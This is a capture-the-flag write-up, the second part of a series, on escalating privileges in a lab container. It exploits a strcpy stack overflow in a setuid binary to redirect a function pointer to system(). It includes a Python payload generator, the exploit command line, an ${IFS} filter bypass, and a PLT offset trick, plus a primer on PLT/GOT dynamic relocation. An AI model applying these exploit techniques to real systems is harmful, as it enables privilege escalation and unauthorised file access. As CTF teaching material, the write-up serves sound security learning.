T19 Challenge - Part 2
This is the second part of the writeup for the T19 Challenge, and here is part 1. Or just skip to part 3.
Previously, we managed to gain shell access to the server as the user rubyist
, by being able to execute arbitrary commands through the web application. In this part, we will be exploiting a stack buffer overflow on a setuid binary to escalate privileges.
Recon
After submitting the first flag, the challenge tells us that we do not have access to the running server binary, but they heard that Ben is working on it. Running ls -al
in the home directory also shows us a reference to Ben, as we have a symbolic link dbclient
that points to /home/ben/dbclient
.
rubyist@t19-deployment-7b944c57cb-h5vjr:~$ ls -al
total 44
drwxr-xr-x 1 rubyist rubyist 4096 Jan 16 11:03 .
drwxr-xr-x 1 root root 4096 Dec 26 15:26 ..
-rw------- 1 rubyist rubyist 3058 Jan 19 00:27 .bash_history
-rw-r--r-- 1 rubyist rubyist 220 May 15 2017 .bash_logout
-rw-r--r-- 1 rubyist rubyist 3526 May 15 2017 .bashrc
-r----S--- 1 rubyist rubyist 33 Dec 17 13:24 .flag.apprentice
-rw-r--r-- 1 rubyist rubyist 675 May 15 2017 .profile
lrwxrwxrwx 1 rubyist rubyist 18 Dec 26 15:26 dbclient -> /home/ben/dbclient
-rwxrwxr-x 1 rubyist rubyist 1297 Dec 26 12:48 http.rb
-rw-rw-r-- 1 rubyist rubyist 259 Dec 18 13:23 plug.rb
drwxrwxr-x 2 rubyist rubyist 4096 Dec 20 10:56 views
Checking out /home/ben
tells us that dbclient
is a setuid binary. This could be possibly exploited for us to gain the same permissions as the ben
user.
rubyist@t19-deployment-7b944c57cb-h5vjr:~$ ls -al /home/ben
total 60
drwxr-xr-x 1 ben ben 4096 Jan 15 16:19 .
drwxr-xr-x 1 root root 4096 Dec 26 15:26 ..
-rw-r--r-- 1 ben ben 220 May 15 2017 .bash_logout
-rw-r--r-- 1 ben ben 3526 May 15 2017 .bashrc
-r----S--- 1 ben ben 24 Nov 29 15:00 .flag.advanced
-rw-r--r-- 1 ben ben 675 May 15 2017 .profile
-rws---r-x 1 ben ben 14872 Dec 17 18:01 dbclient
-r-------- 1 ben ben 14552 Jan 15 16:19 srv_copy
Once we manage to exploit this binary to get a shell, we will have a shell running as user ben
. Following which, we will have access to the server binary, named as srv_copy
in ben
’s home directory.
Reverse Engineering
Downloading the binary
To analyse dbclient
, we need to download the binary first. The most convenient way I thought of was to get a hexdump of the binary, then reverse it locally. Unfortunately, xxd
and hexdump
were not present on the server. But it turns out there is an od
command to do the work.
od -vtx1 /home/rubyist/dbclient
To avoid having to copy such big chunks of od
output, I redirected the reverse shell output into a file dbclient-dump
, then removed the irrelevant lines. After which, I could easily do the following to recover the binary.
cat dbclient-dump | cut -d" " -f2- | xxd -r -g 1 -p1 > dbclient
Analysing the binary
int main(int argc, char** argv)
{
if (argc == 1)
{
if (ping_server())
{
puts("client: server is live");
return 0;
}
else
{
puts("client: server is bad");
return 1;
}
}
else if (argc == 3)
{
if (!hash_valid(argv[1], strlen(argv[1])))
{
puts("client bad hash");
return 1;
}
char hash[40];
unsigned long long func = 0xFFFFFFFFFFFFFFFF;
strcpy(&hash, argv[1]);
func &= z85_decode; // z85_decode is a function
// cast func to a function that takes a char* and returns a char*
// then call it on hash
decoded_hash = ((char* (*)(char *))func)(&hash);
if (!decoded_hash)
{
puts("client hash failed");
return 1;
}
int res;
if (check_hash(decoded_hash, &res) == 1 )
{
if (res)
printf("true");
else
printf("false");
}
else
{
puts("client server communication failed");
return 1;
}
}
else
{
puts("client [hash] [filename]");
return 1;
}
return 0;
}
The program expects a hash
and filename
as program arguments, which explains the cmd "hash" "name"
seen in part 1. First, the hash will be checked that it only contains the following characters.
123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&<>()[]{}@%$#
Then, the program calls z85decode
on the hash, which is reasonable since the web application performs z85encode
on it. After that, it sends the decoded hash to the server to check whether it is a virus.
Communication with the server is done using sockets (not shown above).
I shall omit the exact implementation details of communicating with the server, as it is not relevant with the vulnerability and exploit for this part. It will however be discussed in part 3.
The vulnerability lies within these 5 lines of code.
char hash[40];
unsigned long long func = 0xFFFFFFFFFFFFFFFF;
strcpy(hash, argv[1]);
func &= z85_decode; // z85_decode is a function
// cast func to a function that takes a char* and returns a char*
// then call it on hash
decoded_hash = ((char* (*)(char *))func)(&hash);
The length of argv[1]
is not checked when doing strcpy
onto hash
. This means we can overflow hash
and overwrite the content in func
. Doing so, we can call almost any function we want, which will then take hash
as an argument.
Exploit
Fortunately, system()
is present in the binary, so we can just change func
to it.
The attack plan is now simple, write our command into hash
, then overwrite func
such that doing func &= z85_decode
turns func
to the address of system()
, which will result in system(our_command)
being executed.
As the address of z85_decode
is 0x401af6
, while system is 0x400a60
, we just need to find 3 valid bytes as func
’s initial value. Overwriting with 0x4a4a60
, in other words "hJJ"
, works.
Nasty filter
// 123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&<>()[]{}@%$#
if (!hash_valid(argv[1], strlen(argv[1])))
{
puts("client bad hash");
return 1;
}
Before calling strcpy
, the program checks if all characters in the hash are in a given set. SPACE
and ;
are not allowed. This means we cannot mark the end of our command like /bin/sh;ls;
, nor can we indicate arguments for the command like ls -al
.
As we are overflowing the buffer with strcpy
, we also cannot have null bytes to mark the end of our command, if not we won’t even be able to overwrite the content of func
. For example, we may set hash
to be "/bin/shAAAAAAA...AAAhJJ"
, in order to point func
to system()
. But calling system()
with "/bin/shAAAAAAAAA..."
is going to just result in an error.
There are a few ways to bypass this. One way is to use insert semicolons, as "/bin/sh;AAAA..."
will result in 2 separate commands being executed, namely "/bin/sh"
and AAAA...
. The second one will only be executed when the first one terminates. But we cannot do this, since semicolon is not a valid character.
Another way is to mark the rest of the string as a comment. For example, "/bin/sh #AAA..."
would be fine since "AAA..."
is just a comment. But spaces are not allowed… and "/bin/sh#AAA..."
is not recognized as a valid command.
There is still hope. There is something called an internal field separator in the Linux shell, which can be used by writing ${IFS}
. For example, "echo${IFS}hello${IFS}world"
is equivalent to "echo hello world"
.
Awesome, how about doing "sh${IFS}#AAA..."
to spawn a shell then. Um… apparently this doesn’t work. It turns out that IFS
behaves as separators between command arguments, meaning that doing the above will end up calling sh
with #AAA...
as its argument, resulting in an error.
Nevermind, all we want to do here is just to read files off the server. Not having a shell is totally fine. In that case, we can use the same trick as earlier, by getting a hexdump of a file then converting it back. Or in the case of the flag, we can just use cat
.
cat /home/ben/.flag.advanced
od -vtx1 /home/ben/srv_copy
The reason cat
or od
would work is because cat flag AAAA
would first try to read from flag
, then AAAA
. As flag
is successfully read, it will print the contents first, only after which it will try to read AAAA
and fail. The same applies for od
.
Backquote substitution?
Now, we just need to get into the server, and execute ./dbclient hash filename
, where hash
is our payload. To make things easy, I made a python
script to generate the full command for me.
SPACE = "${IFS}"
payload = "cat" + SPACE + "/home/ben/.flag.advanced" + SPACE
payload = payload.ljust(0x30, "A")
payload += "hJJ"
payload += "BBBBBBBBB"
print("./dbclient \"" + payload.replace("$", "\\$") + "\" aa")
Now, it’s time to get flag.
$ ./dbclient "cat\${IFS}/home/ben/.flag.advanced\${IFS}AAAAAAAAAhJJBBBBBBBBB" aa
sh: 2: Syntax error: EOF in backquote substitution
Backquotes? I didn’t put in any backquotes… what’s wrong? Recall that the address of system is 0x401a60
, and 0x60
translates to '`'
. This means after func&=z85_decode
, hash would now contain the following
cat\${IFS}/home/ben/.flag.advanced\${IFS}AAAAAAAAA`\x1a@BBBBBBBBB
This is where most people are stuck at, I believe. After trying countless ways, I still could not find a way to escape the backquote, making my payload completely useless. Until I remembered, system()
is a function in the procedure linkage table (PLT), and functions in the PLT all maintain the following form.
jmp *<corresponding GOT entry>
push <num>
jmp <top of plt>
Short primer on dynamic relocation
If you are not interested, do skip ahead.
For all the above to make sense, we need to know about how an ELF binary dynamically resolve external library functions, in the case of a dynamically-linked binary, such as dbclient
.
When a dynamically-linked program calls a function from an external library such as libc, the address to that function would not be known during compile time, since, obviously the compiler would not know where will the libraries be mapped during runtime. If the compiler does assign an address, this would break functionality across different versions of the library as the address to a certain function may be different.
On the other hand, a statically-linked binary would have those addresses constant as the compiler copies all the instructions of called functions and embeds them into the binary itself. This allows for a user to not need the required libraries on their system, but this would cause the binary to be very large in size, scaling according to the number of external functions referenced.
Knowing the difference, we can now ask, “how does the program know the addresses of these functions?”. Firstly, the PLT will contain a list of functions that are referenced in the program, and every function looks like the following (except the first one).
jmp *<corresponding GOT entry>
push <num>
jmp <top of plt>
This works by using the global offset table(GOT), which contains a list of addresses to functions from external libraries during runtime. Each function in the PLT would have a corresponding entry in the GOT, which will allow it to jump to the actual function in the external library when being called. Hence, jmp *<corresponding GOT entry>
.
At the start, each global offset table(GOT) entry would contain the address of one instruction after the PLT entry, i.e. address to push <num>
. So, when calling a function for the first time, it will execute
push <num>
jmp <top of plt>
As you can see, the top of the PLT (free@plt-0x10
in the screenshot above) doesn’t have a name. It is actually dl_runtime_resolve
, which as its name suggests, resolves the addresses for a function during runtime. push <num>
is used to tell dl_runtime_resolve
the index in the symbol table to look at, so that it can know which function to resolve.
Here is an example of the GOT. The addresses in green are the ones that have already been resolved, while the yellow ones aren’t.
Completing the exploit
Summarizing the above, instead of having func
pointing to jmp <system_got_entry>
, the same can be achieved by pointing it to push 8
.
0000000000400a60 <__libc_system@plt>:
400a60: ff 25 f2 25 20 00 jmpq *<system_got_entry>
400a66: 68 08 00 00 00 pushq $0x8
400a6b: e9 60 ff ff ff jmpq 4009d0 <dl_runtime_resolve>
With this in place, we just need to go 1 instruction forward, to consider our system()
to be at 0x400a66
instead of 0x400a60
. Now there will be no more backquotes.
You can find the relevant files here.
In part 3, we create a custom client to attack the virus database service and empty the database.
Offtopic: Understanding how dynamic relocation works is the first part of learning the ret2dlresolve technique. For more information, you could look into section 5 of this phrack article, or 二栈溢出漏洞利用-ret2resolve.
If there is anything unclear, feel free to leave a comment below.